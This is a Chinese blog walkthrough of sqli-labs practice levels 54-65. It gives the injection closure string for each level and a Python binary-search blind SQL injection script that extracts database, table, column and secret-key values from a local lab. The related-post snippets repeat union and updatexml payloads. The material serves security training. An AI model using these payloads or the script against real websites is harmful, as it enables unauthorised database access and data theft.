sqli-labs(54-65)终章

最新推荐文章于 2024-02-05 19:04:06 发布
最新推荐文章于 2024-02-05 19:04:06 发布
阅读量627 收藏
点赞数
分类专栏: sqli-labs 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43579362/article/details/104663582
版权

Page4終章以为会很难,结果就是限定注入次数,其他和前面一样,虽然很接近现实注入,但是还是可以采取一些手段来‘无限’注入,比如代理,脚本等。。。

Less-54~57

这4关都是使用联合查询注入,so easy。。。

Less-54

闭合方式:id=1'--+

Less-55

闭合方式:id=1)--+

Less-56

闭合方式:id=1')--+

Less-57

闭合方式:id="--+

Less-58~61

这4关都是使用报错型注入,,,,

Less-58

闭合方式:id=1'--+

Less-59

闭合方式:id=1--+

Less-60

闭合方式:id=1')--+

Less-61

闭合方式:id=1'))--+

Less-62~65

这4都是盲注,写写脚本就好了,,,

Less-62

闭合方式:id=1')--+

Less-63

闭合方式:id=1'--+

Less-64

闭合方式:id=1))--+

Less-65

闭合方式:id=1")--+
还是写了个脚本,前面都可以用的,

import requests
import sys
def u(index,asc):
    url_start='http://127.0.0.1/sqli-labs/Less-65/?id=1")and'
    url_end='--+'
    url_select='(ascii(mid((select group_concat(secret_AO2C)from challenges.LMFZWPHL9J'+'),'+str(index)+',1))>'+str(asc)+')'# 这里的表名和字段名都是会变化的,根据自己跑出来的结果更改,跑key
    ##url_select='(ascii(mid((select group_concat(schema_name)from information_schema.schemata'+'),'+str(index)+',1))>'+str(asc)+')'//跑库
    ##url_select='(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema='+"'challenges'"+'),'+str(index)+',1))>'+str(asc)+')'//跑表名
    ##url_select='(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema='+"'challenges'and table_name='LMFZWPHL9J'"+'),'+str(index)+',1))>'+str(asc)+')'//跑字段
    url=url_start+url_select+url_end
    return url
def url(index,asc):
    re=requests.get(url=u(index,asc)).text
    if 'Angelina' in re:
        return True
    else:
        return False
def dff(index,left,right)://二分法判断
    while left<right:
        asc=int((left+right)/2)
        if url(index,asc):
            left=asc
        else:
            right=asc
        if left+1==right:
            if url(index,left):
                return right
            else:
                return left
if __name__=="__main__":
    for index in range(1024):
        ord1=dff(index,30,126)
        if ord1==31:
            break
        sys.stdout.write(chr(ord1))
        sys.stdout.flush()
    sys.stdout.write("\r\n")
    sys.stdout.flush()

sqli-labs完结。

··KElis
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-labs 注入 54-75关
感恩
09-19 324
SQLi-labs 注入 54-75关
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1600
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
基于Sqli-Labs靶场的SQL注入-54~65
Joker
01-12 478
主要讲最后几关的通关方法。
sqli-labs靶场challenges第54-75关(超详细)
weixin_51566481的博客
08-18 2074
sqlilabs,sql注入
sqli.labs靶场(54-65关)
最新发布
喜欢创作各种技术类文章,希望可以帮到你
02-05 1033
提示尝试是十次后数据库就重置,那我们尝试union原来是单引号闭合数据库:challenges,表名是:4c7k78qe8t,就一个表字段为:查出Secret Key:将获取的key值放到下面输入框点击提交就完成所有步骤。
sql-labs闯关54~65
qq_44663230的博客
09-12 1490
sql-labs闯关54~65
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqlilabs54-65详细教程
黑白的博客
11-08 974
声明 学习SQL注入,提高网路安全能力 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
sqli-labs————Less-54(第四部分:提高部分)
Fly_鹏程万里
05-22 1026
前言在接下来的几关中将会对前面所学习的内容做一个复习,同时也会通过在复杂环境中的应用来提高注入技巧。Less-54源代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xm...
SQLi-LABS Page-4 (Challenges) Less-54-Less-65
weixin_30783913的博客
06-27 183
Less-54 union - 1 http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ zgysfs4pe4 http://10.10.202....
sqli-labs 54-65关卡
borrrrring的博客
10-10 162
less 54 只有10次机会,超过10次会是一个新的随机表名 1.?id=1 //回显正常 2.?id=1’ //回显异常 3.?id=1’ --+ //回显正常 4.?id=1’ order by 3 //回显正常 5.?id=1’ order by 4 //回显异常 6.?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=d
Sql-labs 第54 - 65关 通过笔记(完)
weixin_45619494的博客
10-10 684
id=1'))and updatexml(1,concat(0x5e,(substr((注入select语句),1)),0x5e),1)--+id=1")and updatexml(1,concat(0x5e,(substr((注入select语句),1)),0x5e),1)--+id=1'and updatexml(1,concat(0x5e,(substr((换成select语句),1)),0x5e),1) --+
sqli-labs 46-65
遇事不决冲冲冲
04-10 1111
第46关 知识点 asc:指定列按升序排列 select * from users order by 1 asc; desc:指定列按降序排列selec * from users order by 1 desc Right(数据,数字):从数据的右边开始前数字个字母为select Right(database(),1); Left(数据,数字):从数据的左边开始前数字个字母为select Left(database(),1) lines terminated by xxx:最后写好的句子会以xxx结尾 方法
sqlilabs——Pages4
(∪.∪ )...zzz的博客
12-14 824
这里写自定义目录标题54爆表名爆列爆内容55 逐步爆 ( 54 爆表名 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ 爆列 ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_nam
sqli-labs Less - 62、63、64、65sqli-labs闯关指南 62、63、64、65
m0_54899775的博客
12-30 1827
sqli-labs Less - 62、63、64、65sqli-labs闯关指南 62、63、64、65
SQLi-Labs Less-62 python脚本
学生
05-25 163
SQLi-Labs Less-62 延时注入 python脚本 11/25/2020 雨 正常 乏 import requests import datetime class Bool_Sql_Inject(object): def __init__(self): self.url = "http://192.168.253.130/sql/Less-62/" def database_length(self): for i in range(1, 30):
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值